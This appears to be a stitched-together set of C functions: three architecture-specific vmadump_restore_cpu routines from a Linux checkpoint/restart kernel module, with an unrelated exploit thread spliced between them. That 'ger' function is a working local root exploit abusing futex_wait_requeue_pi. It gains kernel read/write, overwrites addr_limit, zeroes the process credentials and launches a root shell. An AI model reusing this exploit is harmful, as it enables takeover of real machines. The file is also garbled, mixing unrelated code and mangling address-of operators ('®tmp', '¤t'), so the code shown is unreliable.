int vmadump_restore_cpu(struct vmadump_map_ctx *ctx, struct file *file,
struct pt_regs *regs) {
struct pt_regs regtmp;
struct switch_stack *ss, sstmp;
unsigned long usp;
int r;
r = read_kern(ctx, file, ®tmp, sizeof(regtmp));
if (r != sizeof(regtmp)) goto bad_read;
/* Read extra reg info for alpha */
ss = ((struct switch_stack *)regs)-1;
r = read_kern(ctx, file, &sstmp, sizeof(sstmp));
if (r != sizeof(sstmp)) goto bad_read;
r = read_kern(ctx, file, &usp, sizeof(usp));
if (r != sizeof(usp)) goto bad_read;
/* These are the tid-bits we don't want to restore */
regtmp.ps = 8; /* Processor status 8 = user space */
regtmp.hae = regs->hae; /* XXX What is this reg? */
sstmp.r26 = ss->r26; /* Not actually the user r26(ra). That
* one is in struct pt_regs. */
/* Ok, do restore */
memcpy(regs, ®tmp, sizeof(regtmp));
memcpy(ss, &sstmp, sizeof(sstmp)); /* Restores FP regs + saved regs */
wrusp(usp);
return 0;
bad_read:
if (r >= 0) r = -EIO;
return r;
}
void *ger(void *arg){
int sem_id;
void *task_struct,*cred;
char buf[256];
const char new_addr_limit[] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
const char new_egideuid[] = {0,0,0,0};
printf("ger thread\n");
int fd = open("/dev/null", O_RDWR);
setpriority(PRIO_PROCESS , 0, *(int*)arg);
if ((sem_id = semget(IPC_PRIVATE,(WAITER_OVERWRITE_SIZE+WAITER_OVERWRITE_OFFSET)/2,IPC_CREAT | 0660)) < 0){
perror("semget");
}
// don't call anything else to prevent tainting rt_waiter
futex_wait_requeue_pi(&srcfutex, 0, &destfutex, NULL, 0);
semctl(sem_id,-1,SETALL,sem_values);
while(!proceed_to_overwrite);
proceed_to_overwrite = 0;
semctl(sem_id,-1,SETALL,sem_values);
while(!proceed_to_overwrite);
proceed_to_overwrite = 0;
while(write(fd, (void*)(tbase+24), 8) < 0){ printf("no kernel r/w\n"); sleep(1); }
printf("has kernel r/w!\n");
write_kern((void*)(tbase+32), (void *)&new_addr_limit, 8);
futex_wait_requeue_pi(NULL, 0, NULL, NULL, 0); // dummy call to trigger breakpoint
read_kern((void*)(tbase), (void *)&task_struct, 8);
printf("task_struct: %p\n",task_struct);
read_kern((void *)(task_struct+0x598), (void*)&cred, 8);
printf("cred: %p\n",cred);
futex_wait_requeue_pi(NULL, 0, NULL, NULL, 0);
write_kern((void *)(cred+20), (void*)&new_egideuid, 4);
write_kern((void *)(cred+24), (void*)&new_egideuid, 4);
futex_wait_requeue_pi(NULL, 0, NULL, NULL, 0);
if(geteuid() != 0) printf("not root :(\n");
sprintf(buf,"sh -c \"echo success %d > offset.txt && chmod 777 offset.txt && sh \"",WAITER_OVERWRITE_OFFSET);
system(buf);
printf("ger function exiting\n");
return NULL;
}
int vmadump_restore_cpu(cr_rstrt_proc_req_t *ctx, struct file *file,
struct pt_regs *regs) {
struct pt_regs regtmp;
int r;
r = read_kern(ctx, file, ®tmp, sizeof(regtmp));
if (r != sizeof(regtmp)) goto bad_read;
/* Don't restore machine state register since this is
* unpriviledged user space stuff we're restoring. */
if (regtmp.msr & MSR_SF) {
regtmp.msr = MSR_USER64;
clear_thread_flag(TIF_32BIT);
} else {
regtmp.msr = MSR_USER32;
set_thread_flag(TIF_32BIT);
}
memcpy(regs, ®tmp, sizeof(regtmp));
/* Floating point regs */
r = read_kern(ctx, file, ¤t->thread.fpr,
sizeof(current->thread.fpr));
if (r != sizeof(current->thread.fpr)) goto bad_read;
r = read_kern(ctx, file, ¤t->thread.fpscr,
sizeof(current->thread.fpscr));
if (r != sizeof(current->thread.fpscr)) goto bad_read;
#if HAVE_THREAD_VDSO_BASE
/* unconditonally restore this */
r = read_kern(ctx, file, ¤t->thread.vdso_base,
sizeof(current->thread.vdso_base));
if (r != sizeof(current->thread.vdso_base)) goto bad_read;
#endif
#ifdef CONFIG_ALTIVEC
/* Restore Altivec */
r = read_kern(ctx, file, ¤t->thread.vr,
sizeof(current->thread.vr));
if (r != sizeof(current->thread.vr)) goto bad_read;
r = read_kern(ctx, file, ¤t->thread.vscr,
sizeof(current->thread.vscr));
if (r != sizeof(current->thread.vscr)) goto bad_read;
#endif
current->thread.regs = regs;
return 0;
bad_read:
if (r >= 0) r = -EIO;
return r;
}
int vmadump_restore_cpu(cr_rstrt_proc_req_t *ctx, struct file *file,
struct pt_regs *regs) {
struct vmadump_restore_tmps *x86tmps;
struct thread_struct *threadtmp;
struct pt_regs *regtmp;
int r;
int idx, i, cpu;
uint16_t fsindex, gsindex;
#if HAVE_STRUCT_N_DESC_STRUCT
struct n_desc_struct tls_array[GDT_ENTRY_TLS_ENTRIES];
#else
struct desc_struct tls_array[GDT_ENTRY_TLS_ENTRIES];
#endif
/* XXX: Note allocation assumes i387tmp and threadtmp are never active at the same time */
x86tmps = kmalloc(sizeof(*x86tmps), GFP_KERNEL);
if (!x86tmps) return -ENOMEM;
regtmp = VMAD_REGTMP(x86tmps);
threadtmp = VMAD_THREADTMP(x86tmps);
r = read_kern(ctx, file, regtmp, sizeof(*regtmp));
if (r != sizeof(*regtmp)) goto bad_read;
/* Don't let the user pick funky segments */
if ((regtmp->cs != __USER_CS && regtmp->cs != __USER32_CS) &&
(regtmp->ss != __USER_DS && regtmp->ss != __USER32_DS)) {
r = -EINVAL;
goto bad_read;
}
/* Set our process type */
if (regtmp->cs == __USER32_CS)
set_thread_flag(TIF_IA32);
else
clear_thread_flag(TIF_IA32);
/* Only restore bottom 9 bits of eflags. Restoring anything else
* is bad bad mojo for security. (0x200 = interrupt enable) */
#if HAVE_PT_REGS_EFLAGS
regtmp->eflags = 0x200 | (regtmp->eflags & 0x000000FF);
#elif HAVE_PT_REGS_FLAGS
regtmp->flags = 0x200 | (regtmp->flags & 0x000000FF);
#else
#error
#endif
memcpy(regs, regtmp, sizeof(*regtmp));
/* Restore FPU info (and later general "extended state") */
r = vmadump_restore_i387(ctx, file, VMAD_I387TMP(x86tmps));
if (r < 0) goto bad_read;
/* XXX FIX ME: RESTORE DEBUG INFORMATION ?? */
/* Here we read it but ignore it. */
r = vmadump_restore_debugreg(ctx, file);
if (r < 0) goto bad_read;
/* user(r)sp, since we don't use the ptrace entry path in BLCR */
#if HAVE_THREAD_USERSP
r = read_kern(ctx, file, &threadtmp->usersp, sizeof(threadtmp->usersp));
if (r != sizeof(threadtmp->usersp)) goto bad_read;
current->thread.usersp = threadtmp->usersp;
vmad_write_oldrsp(threadtmp->usersp);
#elif HAVE_THREAD_USERRSP
r = read_kern(ctx, file, &threadtmp->userrsp, sizeof(threadtmp->userrsp));
if (r != sizeof(threadtmp->userrsp)) goto bad_read;
current->thread.userrsp = threadtmp->userrsp;
vmad_write_oldrsp(threadtmp->userrsp);
#else
#error
#endif
/*-- restore segmentation related stuff */
/* Restore FS_BASE MSR */
r = read_kern(ctx, file, &threadtmp->fs, sizeof(threadtmp->fs));
if (r != sizeof(threadtmp->fs)) goto bad_read;
if (threadtmp->fs >= TASK_SIZE) {
r = -EINVAL;
goto bad_read;
}
current->thread.fs = threadtmp->fs;
if ((r = checking_wrmsrl(MSR_FS_BASE, threadtmp->fs)))
goto bad_read;
/* Restore GS_KERNEL_BASE MSR */
r = read_kern(ctx, file, &threadtmp->gs, sizeof(threadtmp->gs));
if (r != sizeof(threadtmp->gs)) goto bad_read;
if (threadtmp->gs >= TASK_SIZE) {
r = -EINVAL;
goto bad_read;
}
current->thread.gs = threadtmp->gs;
if ((r = checking_wrmsrl(MSR_KERNEL_GS_BASE, threadtmp->gs)))
goto bad_read;
/* Restore 32 bit segment stuff */
r = read_kern(ctx, file, &fsindex, sizeof(fsindex));
if (r != sizeof(fsindex)) goto bad_read;
r = read_kern(ctx, file, &gsindex, sizeof(gsindex));
if (r != sizeof(gsindex)) goto bad_read;
r = read_kern(ctx, file, tls_array, sizeof(tls_array));
if (r != sizeof(tls_array)) goto bad_read;
/* Sanitize fs, gs. These segment descriptors should load one
* of the TLS entries and have DPL = 3. If somebody is doing
* some other LDT monkey business, I'm currently not
* supporting that here. Also, I'm presuming that the offsets
* to the GDT_ENTRY_TLS_MIN is the same in both kernels. */
idx = fsindex >> 3;
if (idx<GDT_ENTRY_TLS_MIN || idx>GDT_ENTRY_TLS_MAX || (fsindex&7) != 3)
fsindex = 0;
idx = gsindex >> 3;
if (idx<GDT_ENTRY_TLS_MIN || idx>GDT_ENTRY_TLS_MAX || (gsindex&7) != 3)
gsindex = 0;
/* Sanitize the TLS entries...
* Make sure the following bits are set/not set:
* bit 12 : S = 1 (code/data - not system)
* bit 13-14: DPL = 11 (priv level = 3 (user))
* bit 21 : = 0 (reserved)
*
* If the entry isn't valid, zero the whole descriptor.
*/
for (i=0; i < GDT_ENTRY_TLS_ENTRIES; i++) {
if (tls_array[i].b != 0 &&
(tls_array[i].b & 0x00207000) != 0x00007000) {
r = -EINVAL;
goto bad_read;
}
}
/* Ok load this crap */
cpu = get_cpu(); /* load_TLS can't get pre-empted. */
memcpy(current->thread.tls_array, tls_array,
sizeof(current->thread.tls_array));
current->thread.fsindex = fsindex;
current->thread.gsindex = gsindex;
load_TLS(¤t->thread, cpu);
loadsegment(fs, current->thread.fsindex);
load_gs_index(current->thread.gsindex);
put_cpu();
/* In case cr_restart and child don't have same ABI */
if (regtmp->cs == __USER32_CS) {
loadsegment(ds, __USER32_DS);
loadsegment(es, __USER32_DS);
} else {
loadsegment(ds, __USER_DS);
loadsegment(es, __USER_DS);
}
#if HAVE_THREAD_INFO_SYSENTER_RETURN
{
void *sysenter_return;
r = read_kern(ctx, file, &sysenter_return, sizeof(sysenter_return));
if (r != sizeof(sysenter_return)) goto bad_read;
current_thread_info()->sysenter_return = sysenter_return;
}
#endif
kfree(x86tmps);
return 0;
bad_read:
kfree(x86tmps);
if (r >= 0) r = -EIO;
return r;
}
